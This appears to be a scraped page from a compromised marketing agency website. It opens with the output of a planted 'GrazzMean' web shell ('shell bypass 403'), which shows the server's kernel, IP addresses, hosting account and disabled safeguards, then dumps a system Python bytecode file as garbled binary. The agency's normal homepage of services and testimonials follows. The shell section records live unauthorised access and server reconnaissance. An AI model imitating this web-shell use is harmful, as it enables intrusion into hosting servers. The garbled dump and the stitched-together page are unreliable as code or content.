404 Not Found


nginx
beegazpacho.com - GrazzMean
shell bypass 403

GrazzMean Shell

Uname: Linux in-mum-web1557.main-hosting.eu 5.14.0-503.35.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025 x86_64
Software: LiteSpeed
PHP version: 8.2.30 [ PHP INFO ] PHP os: Linux
Server Ip: 88.222.243.91
Your Ip: 216.73.216.168
User: u848900432 (848900432) | Group: o51372345 (1051372345)
Safe Mode: OFF
Disable Function:
NONE

name : _option.cpython-39.opt-1.pyc
a

f�_T3�@s�dZddlZddlZddlmZmZmZmZmZddlm	Z	ddl
mZddlm
Z
e	d�Ze�e���Zgd	�ZGd
d�dej�ZGdd
�d
ej�ZGdd�dej�ZeZdS)a,GOption command line parser

Extends optparse to use the GOptionGroup, GOptionEntry and GOptionContext
objects. So it is possible to use the gtk, gnome_program and gstreamer command
line groups and contexts.

Use this interface instead of the raw wrappers of GOptionContext and
GOptionGroup in glib.
�N)�
OptParseError�OptionError�OptionValueError�BadOptionError�OptionConflictError�)�get_introspection_module)�_gi)�GError�GLib)	rrrrr�Option�OptionGroup�OptionParser�make_optionc@sNeZdZdZejjdZejjgd�Zdej	Z
dd�Zdd�Zd	d
�Z
dS)ra�Represents a command line option

    To use the extended possibilities of the GOption API Option
    (and make_option) are extended with new types and attributes.

    Types:
        filename   The supplied arguments are read as filename, GOption
                   parses this type in with the GLib filename encoding.

    :ivar optional_arg:
        This does not need a arguement, but it can be supplied.
    :ivar hidden:
        The help list does not show this option
    :ivar in_main:
        This option apears in the main group, this should only
        be used for backwards compatibility.

    Use Option.REMAINING as option name to get all positional arguments.

    .. NOTE::
        Every argument to an option is passed as utf-8 coded string, the only
        exception are options which use the 'filename' type, its arguments
        are passed as strings in the GLib filename encoding.

    For further help, see optparse.Option.
    )�filename)�hidden�in_main�optional_arg�--cOs^tjj|g|�Ri|��|js(td��t|j�t|j�krDtd��|jsZtd|jd��dS)Nz!%s at least one long option name.z;%s at least more long option names than short option names.z%s needs a help message.r)�optparser�__init__�
_long_opts�
ValueError�len�_short_opts�help��self�args�kwargs�r �0/usr/lib64/python3.9/site-packages/gi/_option.pyr^s�zOption.__init__cCsF|j|vr|j�|j�tj�||�t|j�t|j�krBtd��dS)NzCgoption.Option needs more long option names than short option names)	�	REMAININGr�appendrr�_set_opt_stringrrr)rZoptsr r r!r$js

zOption._set_opt_stringccs�d}|jr|tjjO}|jr(|tjjO}|��rD|jrP|tjjO}n|tjj	O}|j
dkrf|tjjO}t|j
|j�D]@\}}|d}t|t�s�|�d�}|dd�|||j|jfVqt|j
t|j�d�D] }|dd�d||j|jfVq�dS)Nrrrzutf-8��)rrZOptionFlagsZHIDDENrZIN_MAINZtakes_valuerZOPTIONAL_ARGZNO_ARG�typeZFILENAME�ziprr�
isinstance�bytes�encoder�metavarr)r�flagsZ	long_nameZ
short_nameZshort_bytesr r r!�_to_goptionentriesrs$


zOption._to_goptionentriesN)�__name__�
__module__�__qualname__�__doc__rrZTYPESZATTRSrZOPTION_REMAININGr"rr$r.r r r r!r7s
rc@s<eZdZdZddd�Zdd�Zdd	�Zdd
d�Zdd
�ZdS)r
a�A group of command line options.

    :param str name:
        The groups name, used to create the --help-{name} option
    :param str description:
        Shown as title of the groups help view
    :param str help_description:
        Shown as help to the --help-{name} option
    :param list option_list:
        The options used in this group, must be option.Option()
    :param dict defaults:
        A dicitionary of default values
    :param translation_domain:
           Sets the translation domain for gettext().

    .. NOTE::
        This OptionGroup does not exactly map the optparse.OptionGroup
        interface. There is no parser object to supply, but it is possible
        to set default values and option_lists. Also the default values and
        values are not shared with the OptionParser.

    To pass a OptionGroup into a function which expects a GOptionGroup (e.g.
    gnome_program_init() ). OptionGroup.get_option_group() can be used.

    For further help, see optparse.OptionGroup.
    �NcCsVtj�|td|�||_d|_||_|r.||_d|_||_	|rR|D]}|�
|�qBdS)N�error)rZOptionContainerrr�name�parser�help_description�defaults�values�translation_domainZ
add_option)rr5�descriptionr7�option_listr8r:�optionr r r!r�szOptionGroup.__init__cCsg|_|��dS�N)r<Z_create_option_mappings)rr r r!�_create_option_list�szOptionGroup._create_option_listcsb��fdd�}t��j�j�j|�}�jr6|��j�g}�jD]}|�|�	��q@|�
|�|S)Ncs�|�d�r�j|}n
�j|}z|�||�j��WnHty~t��d}tt	|��}t
|_tj
j|_t	|�|_|�Yn0dS)Nrr)�
startswith�	_long_opt�
_short_opt�processr9r�sys�exc_infor
�str�OPTION_CONTEXT_ERROR_QUARK�domainrr�	BAD_VALUE�code�message)�option_name�option_value�group�optr4Zgerror�r6rr r!�callback�s



z.OptionGroup._to_goptiongroup.<locals>.callback)r	r
r5r;r7r:Zset_translation_domainr<�extendr.�add_entries)rr6rQrN�entriesr=r rPr!�_to_goptiongroup�s�

zOptionGroup._to_goptiongroupcCs|��|�|�S)z� Returns the corresponding GOptionGroup object.

        Can be used as parameter for gnome_program_init(), gtk_init().
        )�set_values_to_defaultsrU)rr6r r r!�get_option_group�szOptionGroup.get_option_groupcCsR|jD]8}|j�|j�}t|t�r|��}|�||�|j|j<qt�	|j�|_
dSr>)r<r8�get�destr)rFZget_opt_stringZcheck_valuerZValuesr9)rr=�defaultZopt_strr r r!rV�s

�z"OptionGroup.set_values_to_defaults)r3NNN)N)	r/r0r1r2rr?rUrWrVr r r r!r
�s�

r
c@sJeZdZdZdd�Zdd�Zdd�Zdd	�Zd
d�Zdd
�Z	ddd�Z
dS)raHCommand line parser with GOption support.

    :param bool help_enabled:
        The --help, --help-all and --help-{group} options are enabled (default).
    :param bool ignore_unknown_options:
        Do not throw a exception when a option is not knwon, the option
        will be in the result list.

    .. NOTE::
        The OptionParser interface is not the exactly the same as the
        optparse.OptionParser interface. Especially the usage parameter
        is only used to show the metavar of the arguements.

    OptionParser.add_option_group() does not only accept OptionGroup instances
    but also glib.OptionGroup, which is returned by gtk_get_option_group().

    Only glib.option.OptionGroup and glib.option.Option instances should
    be passed as groups and options.

    For further help, see optparse.OptionParser.
    cOsNd|vrt|d<|�dd�|_|�dd�|_tjj|g|�Rddi|��dS)NZoption_class�help_enabledT�ignore_unknown_optionsFZadd_help_option)r�popr[r\rrrrr r r!rs�
�
�zOptionParser.__init__cCs8|durd|_n$|�d�r.|td�d�|_n||_dS)Nr3z%prog)�usager@r)rr^r r r!�	set_usages

zOptionParser.set_usagec
s��jr�jd�j}n�j}t�|�}|��j�|��j��jD]*}t	|tj
�r\|}n
|���}|�|�qF��fdd�}t�
ddd|�}g}�j
D]}	|�|	���q�|�|�|�|�|S)Nz - cs4|�d�r�j|}n
�j|}|�||���dS)Nr)r@rArBrC)rLrMrNrO�rr9r r!rQ's

z1OptionParser._to_goptioncontext.<locals>.callback)r;r^r	Z
OptionContextZset_help_enabledr[Zset_ignore_unknown_optionsr\�
option_groupsr)r
rW�	add_groupr<rRr.rSZset_main_group)
rr9Zparameter_string�contextZoption_groupZg_grouprQZ
main_groupZmain_entriesr=r r`r!�_to_goptioncontexts&





zOptionParser._to_goptioncontextcOs�t|dt�r2tj�|t|g|�Ri|���dSt|�dkr�|s�t|dt�rz|djsd||d_|dj|urztd��t|dt	j�r�|j
�|d�dStjj|g|�Ri|��dS)Nrrz"invalid OptionGroup (wrong parser))r)rFrr�add_option_groupr
rr6rr	rar#rr r r!re7s�

zOptionParser.add_option_groupcCs6|jdd�}|jD]}t|tj�r|�|j�q|Sr>)r<rar)rr
rR)r�optionsrNr r r!�_get_all_optionsGs

zOptionParser._get_all_optionscCs4|�|�}|�tjdg|�dd�|dd�<dS)Nrr)rd�parserD�argv)rZlargsZrargsr9rcr r r!�
_process_argsNs
zOptionParser._process_argsNcCs�ztj�|||�\}}Wnzty�t��d}|jtkr>�|jt	j
jkrXt|j
��n6|jt	j
jkrrt|j
��n|jt	j
jkr�t|j
��n�Yn0|jD]&}|jj��D]\}}|�||�q�q�||fS)Nr)rr�
parse_argsr
rDrErHrGrJrrrIrrKZUNKNOWN_OPTIONrZFAILEDrrar9�__dict__�itemsZensure_value)rrr9rfr4rN�key�valuer r r!rkVs&�

zOptionParser.parse_args)NN)r/r0r1r2rr_rdrergrjrkr r r r!r�s	 r)r2rDrrrrrr�modulerZgir	Z	gi._errorr
rZquark_to_stringZoption_error_quarkrG�__all__rr
rrr r r r!�<module>s

Wa
© 2026 GrazzMean
Beegazpacho


Let’s  Start  Your  Online  Journey  with  Beegazpacho 

Welcome to Beegazpacho,
where creativity meets strategy,
and innovation drives success.


Contact
Now


OUR CLIENTS

WhatsApp-Image-2021-12-06.png
Untitled-design-11.png
niaf-logo.png
20220406-163308-scaled.jpg
karchi-logo.png
20220405-171252.png
20220405-171309.png
20220321-161603.png
20220321-161611.png
20220321-161628.png
20220321-161244.png
20220321-161256.png
20220321-161450.png
20220321-161205.png
20220226-170222.png
20220321-161051.png
20211202-170852.png
Untitled-design-9
pidilite-png-logo-colour
logo-black-e1706125740216-qisosldqhzgcaerhdt6n4t3m4s50jr0iik48z0h5vk
Fraikin-Dayim-logo-1
hpcl-logo-2-1
services

Transforming Ideas into
Success

.01
Digital Marketing

We drive growth through data-driven strategies and cutting-edge techniques.

Learn More

.02
SEO

Improve your online visibility and rank higher on search engines with our expert SEO services.

Learn More

.03
Website Designing

We design websites that are not only visually stunning but also user-centric, ensuring seamless navigation and enhanced user experience.

Learn More

.04
App Development

Our apps are crafted to be intuitive, engaging, and functional, providing your users with an exceptional mobile experience.

Learn More

.05
Social Media Ads

Target the right audience with precision and creativity to maximize engagement and conversions.

Learn More

.06
Google Ads

Maximize ROI with precision-targeted campaigns on Google’s powerful ad platform.

Learn More

.07
Google My Business

Optimize your local presence with strategies that put your business on the map and attract more customers.

Learn More

.08
Graphic Designing

Our designs tell your brand’s story in a visually compelling way.

Learn More

.09
3D Videos

Bring your product to life with immersive and dynamic 3D explainer videos.

Learn More

about BEEGAZPACHO

creating special Things
For special brands

Join the ranks of successful brands by partnering with Beegazpacho

00+

Happy Customer

00+

Continents

Our vision is not just to be a service provider but to be your partner in growth. We see ourselves as an extension of your team, working tirelessly to ensure that your brand not only meets its goals but surpasses them.

Explore
more

Our Recent Work

Crafted with Passion and Precision

Connect now


Web Design
Design, Development & Identity

Logo Design
Design, Development & Identity

Creative Brand design
Design, Development & Identity

Product Design Marketing
Design, Development & Identity

DIGITAL MARKETING
SEO
WEBSITE DESIGNING
APP DEVELOPMENT
SOCIAL MEDIA ADS
GOOGLE ADS
GOOGLE MY BUSINESS
GRAPHIC DESINING
3D VIDEOS
Client Stories

Hear It from Those Who Know Us Best

Our clients’ success stories speak volumes about our commitment to excellence. Don’t just take our word for it—hear directly from the brands we’ve partnered with. Their testimonials highlight our ability to bring visions to life and create a lasting impact on their businesses.

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors

“Beegazpacho feels like an extension of our team. Their content marketing and social media expertise have elevated our brand. They listen, adapt, and always deliver on time. We look forward to continuing this partnership.”

— Sarah Williams

Head of Marketing, GreenPlanet Apparel

“Beegazpacho’s data-driven strategies helped us improve our online ads, optimize our website, and enhance branding. We’ve seen great ROI and increased visibility. Their professionalism is unmatched.”

— Arvind Shah

CEO, InnovateTech Solutions

“Partnering with Beegazpacho has been a game-changer for our brand. Their creative ad campaigns and SEO services have boosted our online presence and significantly increased leads and sales. We couldn’t ask for a better partner!”

— Rina Kapoor

Marketing Director, Luxury Home Interiors